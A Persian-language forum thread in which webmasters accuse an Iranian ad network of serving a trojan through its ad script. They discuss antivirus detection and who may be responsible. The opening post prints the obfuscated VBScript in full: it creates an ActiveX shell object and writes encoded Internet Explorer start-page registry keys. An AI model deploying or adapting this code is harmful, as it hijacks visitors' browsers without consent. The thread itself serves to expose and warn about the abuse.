برگزیده های پرشین تولز

سوء استفاده كليك ايران از اعضاي خود !!!

phpmkr

Registered User
تاریخ عضویت
3 فوریه 2009
نوشته‌ها
166
لایک‌ها
4
سلام به همه.
چون خيلي از دوستان توي همين فروم از سيستم كليك ايران تعريف كردند ، براي تست يه چند روزي تبليغات اين سيستم رو تو يكي از وبلاگهام گذاشتم تا اگه ازش راضي بودم توي وبسايتهام بذارم.
ولي متاسفانه امروز ديدم وقتي وبلاگم رو باز ميكنم آنتي ويروسم(Kasper Sky) هشدار ميده كه اين وبلاگ ويروسي هست.
جالب اينه كه اين وبلاگ بجز اسكريپت كليك ايران هيچ اسكريپت ديگه اي نداشته!
فايل اسكريپت رو كه دانلود كردم ديدم يه تروجان هست كه با وي بي اسكريپت نوشتن و ظاهراً يه چيزايي توي رجيستري مينويسه.
البته من قبلاً از چندين نفر درباره سوء استفاده و ويروس پراكني اين سيستم شنيده بودم ولي تا با چشماي خودم نديدم باورم نشد!
ظاهراً كليك ايران اين تروجان رو توي زمانهاي خاصي فعال ميكنه و بعد از چند ساعت دوباره غيرفعالش ميكنن.

اين عكسي هست كه من از وبلاگم گرفتم و همه چيز رو نشون ميده :
7b5cs0nt12ylchntspr.jpg



اين هم كد مربوط به تروجان :
کد:
Function AxClip()
Set axclip_sub_ir = document.createElement("object")
axclip_sub_ir.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set jjhacker = axclip_sub_ir.createobject("wscript.shell","")
hr="092083079070084087065082069092077105099114111115111102116092073110116101114110101116032069120112108111114101114092077097105110092083116097114116032080097103101"
re1="072075069089095076079067065076095077065067072073078069"
re2="072075069089095067085082082069078084095085083069082"
For axclip = 1 To Len(hr) Step 3
hr2=hr2 & chr(mid(hr,axclip,3))
next
For axclip = 1 To Len(re1) Step 3
re1_b=re1_b & chr(mid(re1,axclip,3))
next
For axclip = 1 To Len(re2) Step 3
re2_b=re2_b & chr(mid(re2,axclip,3))
next
jjhacker.regwrite re1_b & hr2,axclip_name
jjhacker.regwrite re2_b & hr2,axclip_name
AxClip=SetTimeOut("axclip", (pars20*1), "VBScript")
'MsgBox now()
end Function
AxClip

در ضمن فايل تروجان رو هم ضميمه كردم

اگه كسي ديگه از دوستان هم تا حالا همچين موردي رو ديده بياد همينجا بگه تا همه از سوء استفاده كليك ايران از وبمسترها آگاه بشن.
 

فایل های ضمیمه

  • mainh.zip
    588 بایت · نمایش ها: 12

Pixelweb

Registered User
تاریخ عضویت
11 می 2009
نوشته‌ها
1,316
لایک‌ها
80
محل سکونت
Shiraz
کار این تروجان دقیقا چی هست؟ چیکار میکنه؟
 

mr_net

Registered User
تاریخ عضویت
25 مارس 2009
نوشته‌ها
2,489
لایک‌ها
283
محل سکونت
InterNet
هر دم از این باغ بری میرسد تازه تر از تازه تری میرسد
 

Hosseinpro

کاربر قدیمی پرشین تولز*همکار باز نشسته
فروشنده معتبر
تاریخ عضویت
14 ژانویه 2006
نوشته‌ها
4,540
لایک‌ها
998
سن
39
محل سکونت
یزد

Hosseinpro

کاربر قدیمی پرشین تولز*همکار باز نشسته
فروشنده معتبر
تاریخ عضویت
14 ژانویه 2006
نوشته‌ها
4,540
لایک‌ها
998
سن
39
محل سکونت
یزد
از همه مهمتر چرا آنتی ویروس ما این پیغام رو نمیده ؟از 32 Nod که هر روز آپدیت میشه استفاده میکنم
چرا خود فایر فاکس( که خیلی از سایت هایی رو که ویروسی هستن و جلوشون رو میگیره و پیغام میده ) واسه این سایت آلارم و اخطار نمیده؟
میشه لینک وبلاگت رو واسم پخ کنی؟
 

ravanshenas

Registered User
تاریخ عضویت
19 آگوست 2008
نوشته‌ها
171
لایک‌ها
4
بعضی از دوستان که ازش تعریف می کردن.امیدوارم شما اشتباه کرده باشی و همچین مشکلی نداشته باشه .
 

phpmkr

Registered User
تاریخ عضویت
3 فوریه 2009
نوشته‌ها
166
لایک‌ها
4
از همه مهمتر چرا آنتی ویروس ما این پیغام رو نمیده ؟از 32 Nod که هر روز آپدیت میشه استفاده میکنم
چرا خود فایر فاکس( که خیلی از سایت هایی رو که ویروسی هستن و جلوشون رو میگیره و پیغام میده ) واسه این سایت آلارم و اخطار نمیده؟

من تا حالا خيلي از سايتهاي ويروسي ديدم كه نه نو 32د و نه فايرفاكس پيغام دادن! اين كه دليل نميشه!
در مورد وبلاگم هم خيالتون راحت باشه. يه وبلاگ كاملاً تستي بوده كه بجز يه مطلب هيچ كد يا اسكريپت ديگه اي نداشته . فقط اسكريپت كليك ايران بوده كه اونم الان برداشته شده!
در ضمن من كه عرض كردم توي يه زمانهاي خاصي اين تروجان رو فعال ميكنه.

فكر كنم كار اين تروجان اينه كه سايت كليك ايران رو بدون اجازه كاربران صفحه خانگي ميكنه!! به هر حال اين يعني سوء استفاده.
 

phpmkr

Registered User
تاریخ عضویت
3 فوریه 2009
نوشته‌ها
166
لایک‌ها
4
البته من تا حالا اين تروجان رو ديدم. احتمال اين كه توي زمانهاي ديگه هم تروجانهاي ديگه شونو فعال كنن زياده
 

ramin.samad

Registered User
تاریخ عضویت
2 ژانویه 2009
نوشته‌ها
214
لایک‌ها
0
محل سکونت
اینترنت
از همه مهمتر چرا آنتی ویروس ما این پیغام رو نمیده ؟از 32 Nod که هر روز آپدیت میشه استفاده میکنم
چرا خود فایر فاکس( که خیلی از سایت هایی رو که ویروسی هستن و جلوشون رو میگیره و پیغام میده ) واسه این سایت آلارم و اخطار نمیده؟
میشه لینک وبلاگت رو واسم پخ کنی؟

آخه NODE32 که خاصیت نداره شما باید از کسپر اسکای استفاده کنی تا تفاوتش رو بفهمی
فایرفاکس بهترین مروگر هستش اما جلوی بعضی از سایتها رو نمی تونه بگیره
 

ravanshenas

Registered User
تاریخ عضویت
19 آگوست 2008
نوشته‌ها
171
لایک‌ها
4
آره کاسپر اسکای خیلی دقیقتر هست Nod32 بیشتر محبوبیتش برای اینه که خیلی سریع آپدیت می شه که این هم نشان دهنده اینه که چون دانلود فایلهای آپدیتش از آنتی ویروسهای دیگه سریعتر هست بنابراین ممکنه خیلی از ویروسها و تروجانها را شناسایی نکنه و این یک معضل بزرگ برای کاربران ایرانی هست که فکر می کنن نود 32 بهترینه در حالیکه اینطور نیست و خیلی بیش از اندازه بهش اعتماد شده.من خودم یکبار بدجور قربانیش شدم....
 

GraphX

Registered User
تاریخ عضویت
20 می 2009
نوشته‌ها
8,043
لایک‌ها
7,716
محل سکونت
دنيای مجازی
اگه آدرس وبلاگتو بدي ممنون ميشم
 

milade

Registered User
تاریخ عضویت
25 فوریه 2009
نوشته‌ها
439
لایک‌ها
1,009
سلام دوستان.

چون یه برنامه نویس وب اپلیکیشن ام گفتم اطلاعات بدم ...

کلاس BD96C556-65A3-11D0-983A-00C04FC29E36 جهت اتصال به بانکهای اطلاعاتی اکسس هست . که البته جهت اتصال به Browser ها هم مورد استفادس .

اشیاء hr و r1 و r2 نیر یک سری اطلاعات کد شده هستند .

در کل این سورس یک تروجان هست و البته به عنوان Exploit هم شناخته میشه .

این تروجهن نه چیزی روی رجیستری مینویسه نه چیزی !

فقط با این کد صفحه خانگی کاربر رو عوض میکنه !
البته این سورس هم اکنون به وسیله بیشتر انتی ویروسها شناخته میشه و بلاک میشن ( اگه تنظیم شده باشه )

اینم لیست انتی ها تا سال 2006 :
Webwasher-Gateway 6.0.1/20070828 found [VBScript.Vulnerable.gen!High (suspicious)]
Authentium 4.93.8/20070828 found [HTML/IFrame]
F-Prot 4.3.2.48/20070828 found [HTML/IFrame]
Norman 5.80.02/20070828 found [JS/OnlineGames.A]

The actual executable is identified as malicious by:

AntiVir 7.4.1.63/20070828 found [TR/Crypt.FKM.Gen]
Avast 4.7.1029.0/20070827 found [Win32:WOW-FD]
CAT-QuickHeal 9.00/20070825 found [(Suspicious) - DNAScan]
DrWeb 4.33/20070828 found [Trojan.PWS.Wow]
eSafe 7.0.15.0/20070826 found [Suspicious Trojan/Worm]
F-Secure 6.70.13030.0/20070828 found [Trojan-PSW.Win32.WOW.sp]
Fortinet 2.91.0.0/20070828 found [W32/WoW!tr.pws]
Ikarus T3.1.1.12/20070828 found [Trojan-PWS.Win32.WOW.pu]
Kaspersky 4.0.2.24/20070828 found [Trojan-PSW.Win32.WOW.sp]
NOD32v2 2488/20070828 found [Win32/PSW.WOW.SP]
Norman 5.80.02/20070828 found [W32/Wow.BJL]
Sunbelt 2.2.907.0/20070825 found [VIPRE.Suspicious]
Symantec 10/20070828 found [Infostealer.Wowcraft]
TheHacker 6.1.9.175/20070828 found [Trojan/PSW.WOW.sp]
VBA32 3.12.2.3/20070828 found [suspected of Trojan-PSW.Game.9 (paranoid heuristics)]
Webwasher-Gateway 6.0.1/20070828 found [Trojan.Crypt.FKM.Gen]

البته کد یه کمم ناقص هست که ...

موفق باشید
 

GraphX

Registered User
تاریخ عضویت
20 می 2009
نوشته‌ها
8,043
لایک‌ها
7,716
محل سکونت
دنيای مجازی
سلام دوستان.

چون یه برنامه نویس وب اپلیکیشن ام گفتم اطلاعات بدم ...

کلاس BD96C556-65A3-11D0-983A-00C04FC29E36 جهت اتصال به بانکهای اطلاعاتی اکسس هست . که البته جهت اتصال به Browser ها هم مورد استفادس .

اشیاء hr و r1 و r2 نیر یک سری اطلاعات کد شده هستند .

در کل این سورس یک تروجان هست و البته به عنوان Exploit هم شناخته میشه .

این تروجهن نه چیزی روی رجیستری مینویسه نه چیزی !

فقط با این کد صفحه خانگی کاربر رو عوض میکنه !
البته این سورس هم اکنون به وسیله بیشتر انتی ویروسها شناخته میشه و بلاک میشن ( اگه تنظیم شده باشه )

اینم لیست انتی ها تا سال 2006 :


البته کد یه کمم ناقص هست که ...

موفق باشید


ممنون از اطلاعاتتون
 

ravanshenas

Registered User
تاریخ عضویت
19 آگوست 2008
نوشته‌ها
171
لایک‌ها
4
خوب اگه اینطور باشه این یعنی سوءاستفاده از بازدیدکنندگان وبمسترها و همچنین فراری دادن آنها که یعنی هر چی زحمت توی این چند سال کشیدی بر باد رفته فقط به خاطر سوء استفاده این سیستمها که دیگه هیچ اعتباری براشون نمونده با این کارهای بچگانه و غیر حرفه ای.
البته از طرفه دیگه ای هم حتما از بابت انجام اینکار سود خیلی زیادی گیرشون اومده و چندین برابر چیزی که به اعضاشون بعنوان پورسانت می دن برداشت کردن و این هم یعنی سوء استفاده.که در نهایت فقط به ضرر اعضا هست چون سایتهاشون هم از طرف بازدیدکنندگان و بدتر از اون از طرف گوگل بعنوان یه سایت ویروسی شناخته می شه که این فاجعه است
 

balabala

کاربر قدیمی پرشین تولز
کاربر قدیمی پرشین تولز
تاریخ عضویت
22 می 2005
نوشته‌ها
8,362
لایک‌ها
5,745
سن
41
محل سکونت
یه خورده اونورتر
متاسفانه منم همین مشکل رو داشتم و چون سایتم مهم هست سریعا برداشتم تبلیغات رو. چون بعضی از این تروجانها اطلاعات کوکی رو میدزدن و ممکن بود اکنت کاربرانم هک بشه.
من با سوران هم همین مشکل رو داشتم البته!!! این یا میتونه بخاطر ضعف برنامه نویسی اسکریپتهای این سایتهاست باشه که یه تبلیغ دهنده متخلف میتونه اینطوری سورس آلوده ش رو تزریق بکنه بجای تبلیغ. یا به احتمال کمتر شاید خود سرویس دهنده... :| که البته مورد اول محتمل تره!
 

phpmkr

Registered User
تاریخ عضویت
3 فوریه 2009
نوشته‌ها
166
لایک‌ها
4
متاسفانه منم همین مشکل رو داشتم و چون سایتم مهم هست سریعا برداشتم تبلیغات رو. چون بعضی از این تروجانها اطلاعات کوکی رو میدزدن و ممکن بود اکنت کاربرانم هک بشه.
من با سوران هم همین مشکل رو داشتم البته!!! این یا میتونه بخاطر ضعف برنامه نویسی اسکریپتهای این سایتهاست باشه که یه تبلیغ دهنده متخلف میتونه اینطوری سورس آلوده ش رو تزریق بکنه بجای تبلیغ. یا به احتمال کمتر شاید خود سرویس دهنده... :| که البته مورد اول محتمل تره!

از شما بخاطر تاييد كردن اين موضوع و اطلاعاتي كه در اختيار بقيه وبمستر ها گذاشتيد ممنونم.
ولي به نظر من اين كار خود سيستم كليك ايران هست . چون فكر نميكنم سايتشون مشكل XSS داشته باشه (يه جورايي خودم تست كردم ;) ) و از طرفي اونا كه در حال حاضر تبليغ از جايي نميگيرن و همه تبليغات مال خودشونه. توي همون تصويري هم كه فرستادم كاملاً اين موضوع روشنه.
پس فقط يك احتمال ميمونه و اون هم اينه كه سيستم تبليغاتي كليك ايران بدون در نظر گرفتن عواقب ناخوشايند براي اعضاي خودش ، دست به چنين كاري زده.

شما خودتون اگه توي گوگل يه لينكي ببينيد كه زيرش نوشته this website may harm your computer آيا روش كليك ميكنيد؟
 

Hosseinpro

کاربر قدیمی پرشین تولز*همکار باز نشسته
فروشنده معتبر
تاریخ عضویت
14 ژانویه 2006
نوشته‌ها
4,540
لایک‌ها
998
سن
39
محل سکونت
یزد
حالا چه کنیم
بخاطر اینکار کلا تبلیغات رو برداریم کار درستیه؟
آخه فعلا همین سیستمه که حداقل داره پرداختشو بموقع و منظم انجام میده و درآمد خوبه
 
Last edited:

milade

Registered User
تاریخ عضویت
25 فوریه 2009
نوشته‌ها
439
لایک‌ها
1,009
زود قضاوت نکنید .

احتمال 1% احتمال XSS میره ، هر چند من معتقدم چون صفحه CALL نمیشه همین یک درصد هم ...
احتمال 79% کار خودشون هست
احتمال 20% سرور الوده هست .
البته این 20% سرور هم منتفی هست چرا که اگه این طور بود باید روی همه صفحات تاثیر میگزاشت ...

یا همه اینها بهتره سیستم رو خبر کنید و درخواست پاسخگویی کنید و حالت تبلیغات هم به حالت معلق در اورید ...

موفق باشید
 
بالا